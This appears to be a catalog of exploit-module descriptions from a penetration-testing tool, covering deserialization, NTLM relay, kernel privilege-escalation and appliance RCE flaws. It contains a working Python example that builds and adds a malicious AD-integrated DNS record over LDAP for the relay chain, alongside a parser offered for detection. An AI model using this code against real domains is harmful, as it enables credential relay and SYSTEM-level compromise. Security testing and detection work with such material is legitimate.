The vulnerability exists within the GetCookie() endpoint due to unsafe deserialization of AuthorizationCookie objects. The application decrypts the cookie data using AES-128-CBC and then deserializes the plaintext via BinaryFormatter without sufficient type validation, so the encryption layer does not prevent a crafted cookie from reaching the deserializer.
This module uses an insecure deserialization vulnerability in React Server Components to deploy an agent. It first checks whether the target is vulnerable by sending a generic payload to the given endpoint. If the target is vulnerable, an OSCI agent is deployed and the vulnerability is exploited again with a payload that installs an in-memory webshell. The OSCI agent can later use this webshell to execute OS commands or deploy a network agent. The deployed agent runs with the same privileges as the web application.
This module exploits an access control issue in Windows SMB clients to deploy a remote agent with SYSTEM privileges through a multi-stage attack chain:
1. DNS injection: adds a malicious DNS record named 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' to the domain controller via LDAP, pointing at the attacker's IP address.
2. NTLM relay: starts an ntlmrelayx server that waits for SMB authentication attempts and relays them to install an agent with SYSTEM privileges on the target system.
3. RPC coercion: forces the victim system to authenticate to the attacker-controlled DNS name using coercion techniques.
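Step 1 of the chain above is a write to the AD-integrated DNS zone. The Python below is an example added to this page, not code from the module catalogued here: it serialises the dnsRecord value for an A record in the MS-DNSP DNS_RPC_RECORD layout, computes the LDAP DN of the dnsNode in the DomainDnsZones partition (where authenticated users can create child objects by default), and wires both into an ldap3 Connection.add() call. parse_record() reads the same blob back, which is the check a defender runs over a zone to find a record like the one named above. The zone, base DN, IP address and serial are constructed sample values; in real use the serial is taken from the zone's SOA record.

```python
"""
Build, read back and (optionally) add the dnsRecord value behind step 1 of the chain.
Example code added to this page, not a module from the tool catalogued here.
Assumptions: MS-DNSP DNS_RPC_RECORD layout for AD-integrated zones; ldap3's
Connection.add(dn, object_class, attributes) for the network step; every name,
address and serial below is a constructed sample value.
"""
import ipaddress
import struct

DNS_TYPE_A = 0x0001
RANK_ZONE = 0xF0                   # authoritative zone data, what ADIDNS tooling writes
HEADER = struct.Struct("<HHBBHL")  # DataLength, Type, Version, Rank, Flags, Serial
HEADER_LEN = HEADER.size + 4 + 8   # + TtlSeconds (big-endian) + Reserved + TimeStamp


def build_a_record(ip: str, serial: int, ttl: int = 180) -> bytes:
    """Serialise one A record as stored in the dnsRecord attribute of a dnsNode."""
    data = ipaddress.IPv4Address(ip).packed
    blob = HEADER.pack(len(data), DNS_TYPE_A, 5, RANK_ZONE, 0, serial)  # Version must be 5
    blob += struct.pack(">L", ttl)      # TtlSeconds is the one network-byte-order field
    blob += struct.pack("<LL", 0, 0)    # Reserved, TimeStamp (0 = static, never scavenged)
    return blob + data


def parse_record(blob: bytes) -> dict:
    """Decode a dnsRecord value; use it to audit a zone for records that do not belong."""
    if len(blob) < HEADER_LEN:
        raise ValueError("truncated DNS_RPC_RECORD")
    data_len, rtype, version, rank, flags, serial = HEADER.unpack_from(blob, 0)
    if version != 5:
        raise ValueError(f"unexpected DNS_RPC_RECORD version {version}")
    (ttl,) = struct.unpack_from(">L", blob, HEADER.size)
    data = blob[HEADER_LEN:HEADER_LEN + data_len]
    if len(data) != data_len:
        raise ValueError("DataLength does not match payload")
    if rtype == DNS_TYPE_A and data_len == 4:
        value = str(ipaddress.IPv4Address(data))
    else:
        value = data.hex()  # other record types are left undecoded
    return {"type": rtype, "rank": rank, "flags": flags,
            "serial": serial, "ttl": ttl, "data": value}


def record_dn(name: str, zone: str, domain_dn: str) -> str:
    """DN of a dnsNode in the DomainDnsZones partition of the given domain."""
    return f"DC={name},DC={zone},CN=MicrosoftDNS,DC=DomainDnsZones,{domain_dn}"


def add_record(conn, name: str, zone: str, domain_dn: str, ip: str, serial: int):
    """Create the dnsNode over LDAP. conn is an ldap3.Connection or any object with
    the same add() signature; the attribute set matches what a dnsNode needs."""
    dn = record_dn(name, zone, domain_dn)
    attributes = {"dnsRecord": [build_a_record(ip, serial)], "dNSTombstoned": False}
    return conn.add(dn, ["top", "dnsNode"], attributes)


if __name__ == "__main__":
    # Constructed sample values; the record name is the one quoted in the module description.
    blob = build_a_record("10.0.0.5", serial=42)
    print(blob.hex())
    print(parse_record(blob))
    print(record_dn("localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA",
                    "corp.local", "DC=corp,DC=local"))
```

Running the block prints the 28-byte record (24-byte header plus the 4-byte address), its decoded form, and the DN the LDAP add would target. For a detection pass, pull every dnsRecord value under CN=MicrosoftDNS,DC=DomainDnsZones with an LDAP search and feed each through parse_record(); a node whose name does not match the host naming scheme, or whose A record points at an address outside the server ranges, is the artefact this chain leaves behind.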
The Cloud Files Mini Filter Driver (cldflt.sys) present in Microsoft Windows is vulnerable to a Time-of-check Time-of-use (TOCTOU) Race Condition, which can result in arbitrary file write. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges.
Cisco Secure ASA contains an improper validation of user-supplied input in HTTP(S) requests that allows an unauthenticated remote attacker to access restricted URL endpoints related to remote access VPN. Combined with a buffer overflow in the files_action.lua Lua script, these vulnerabilities may allow unauthenticated remote attackers to execute arbitrary code as root or cause unpatched devices to unexpectedly reload, leading to denial of service (DoS) conditions.
An elevation of privilege vulnerability exists due to the Agere Windows Modem kernel module allowing untrusted pointer dereference. The vulnerability could allow an attacker to run code with elevated privileges.
An improper input validation vulnerability in Magento Open Source and Adobe Commerce allows unauthenticated remote attackers with network access via HTTP to achieve session takeover and unauthenticated remote code execution under certain conditions.
The Common Log File System Driver (clfs.sys) present in Microsoft Windows contains a memory corruption vulnerability. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges.
Vulnerability in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration) allows an unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing.
Dell Unity contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to arbitrary command execution.